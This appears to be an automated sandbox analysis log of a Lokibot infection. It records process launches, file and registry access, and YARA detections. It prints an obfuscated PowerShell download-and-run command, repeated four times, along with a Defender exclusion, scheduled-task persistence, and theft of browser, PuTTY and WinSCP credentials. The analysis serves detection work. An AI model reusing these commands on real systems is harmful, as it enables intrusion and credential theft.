Source: C:\Users\user\AppData\Roaming\caspol.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe"
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rrwscqkDSNwLK" /XML "C:\Users\user\AppData\Local\Temp\tmpF9BA.tmp"
Source: C:\Users\user\AppData\Roaming\caspol.exe	Process created: C:\Users\user\AppData\Roaming\caspol.exe "C:\Users\user\AppData\Roaming\caspol.exe"

Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; iex($(iex('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]34+'jg56dwngvuf3icagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagiefezc10wvbficagicagicagicagicagicagicagicagicagicagicaglu1lbwjlukrfrkloavrpt04gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidxjsbu9oiiwgicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagwlbudfzzumhbacxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbnewpwculruxdeyixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicb1alfrcfnyb0lxesx1aw50icagicagicagicagicagicagicagicagicagicagicagtsxjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbhwxlwdmx5a3blktsnicagicagicagicagicagicagicagicagicagicagicaglu5bbuugicagicagicagicagicagicagicagicagicagicagicaizfhhtsigicagicagicagicagicagicagicagicagicagicagicatbmfnrvnwyunlicagicagicagicagicagicagicagicagicagicagicagv1bmvyagicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicakbnp1y0zvqxc6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xotiumy4yndmumtm2lzu1l2nhc3bvbc5leguilcikzu52okfquerbvefcy2fzcg9slmv4zsismcwwkttzvgfyvc1tbgvlucgzkttpzxggicagicagicagicagicagicagicagicagicagicagicaijevovjpbufbeqvrbxgnhc3bvbc5legui'+[char]0x22+'))')))"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; iex($(iex('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]34+'jg56dwngvuf3icagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagiefezc10wvbficagicagicagicagicagicagicagicagicagicagicaglu1lbwjlukrfrkloavrpt04gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidxjsbu9oiiwgicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagwlbudfzzumhbacxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbnewpwculruxdeyixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicb1alfrcfnyb0lxesx1aw50icagicagicagicagicagicagicagicagicagicagicagtsxjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbhwxlwdmx5a3blktsnicagicagicagicagicagicagicagicagicagicagicaglu5bbuugicagicagicagicagicagicagicagicagicagicagicaizfhhtsigicagicagicagicagicagicagicagicagicagicagicatbmfnrvnwyunlicagicagicagicagicagicagicagicagicagicagicagv1bmvyagicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicakbnp1y0zvqxc6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xotiumy4yndmumtm2lzu1l2nhc3bvbc5leguilcikzu52okfquerbvefcy2fzcg9slmv4zsismcwwkttzvgfyvc1tbgvlucgzkttpzxggicagicagicagicagicagicagicagicagicagicagicaijevovjpbufbeqvrbxgnhc3bvbc5legui'+[char]0x22+'))')))"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; iex($(iex('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]34+'jg56dwngvuf3icagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagiefezc10wvbficagicagicagicagicagicagicagicagicagicagicaglu1lbwjlukrfrkloavrpt04gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidxjsbu9oiiwgicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagwlbudfzzumhbacxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbnewpwculruxdeyixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicb1alfrcfnyb0lxesx1aw50icagicagicagicagicagicagicagicagicagicagicagtsxjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbhwxlwdmx5a3blktsnicagicagicagicagicagicagicagicagicagicagicaglu5bbuugicagicagicagicagicagicagicagicagicagicagicaizfhhtsigicagicagicagicagicagicagicagicagicagicagicatbmfnrvnwyunlicagicagicagicagicagicagicagicagicagicagicagv1bmvyagicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicakbnp1y0zvqxc6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xotiumy4yndmumtm2lzu1l2nhc3bvbc5leguilcikzu52okfquerbvefcy2fzcg9slmv4zsismcwwkttzvgfyvc1tbgvlucgzkttpzxggicagicagicagicagicagicagicagicagicagicagicaijevovjpbufbeqvrbxgnhc3bvbc5legui'+[char]0x22+'))')))"	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; iex($(iex('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]34+'jg56dwngvuf3icagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagiefezc10wvbficagicagicagicagicagicagicagicagicagicagicaglu1lbwjlukrfrkloavrpt04gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidxjsbu9oiiwgicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagwlbudfzzumhbacxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicbnewpwculruxdeyixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicb1alfrcfnyb0lxesx1aw50icagicagicagicagicagicagicagicagicagicagicagtsxjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbhwxlwdmx5a3blktsnicagicagicagicagicagicagicagicagicagicagicaglu5bbuugicagicagicagicagicagicagicagicagicagicagicaizfhhtsigicagicagicagicagicagicagicagicagicagicagicatbmfnrvnwyunlicagicagicagicagicagicagicagicagicagicagicagv1bmvyagicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicakbnp1y0zvqxc6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xotiumy4yndmumtm2lzu1l2nhc3bvbc5leguilcikzu52okfquerbvefcy2fzcg9slmv4zsismcwwkttzvgfyvc1tbgvlucgzkttpzxggicagicagicagicagicagicagicagicagicagicagicaijevovjpbufbeqvrbxgnhc3bvbc5legui'+[char]0x22+'))')))"

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_64\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_64\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\caspol.exe	Queries volume information: C:\Users\user\AppData\Roaming\caspol.exe VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\caspol.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformation
Source: C:\Users\user\AppData\Roaming\caspol.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\caspol.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformation
Source: C:\Users\user\AppData\Roaming\caspol.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation
Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe	Queries volume information: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_64\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_64\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\caspol.exe	Queries volume information: C:\Users\user\AppData\Roaming\caspol.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation

Source: C:\Windows\System32\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Lokibot

Source: Yara match	File source: 31.2.rrwscqkDSNwLK.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.caspol.exe.36cfc30.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.caspol.exe.36e9c50.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.rrwscqkDSNwLK.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001F.00000002.488149240.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.480373676.00000000036E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.480373676.00000000036CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.501902826.000000000266A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.477095968.0000000002521000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: caspol.exe PID: 3064, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rrwscqkDSNwLK.exe PID: 2148, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rrwscqkDSNwLK.exe PID: 1988, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000014.00000002.634660515.0000000000854000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: caspol.exe PID: 3232, type: MEMORYSTR

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\AppData\Roaming\caspol.exe	Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
Source: C:\Users\user\AppData\Roaming\caspol.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl

Tries to harvest and steal browser information (history, passwords, etc)

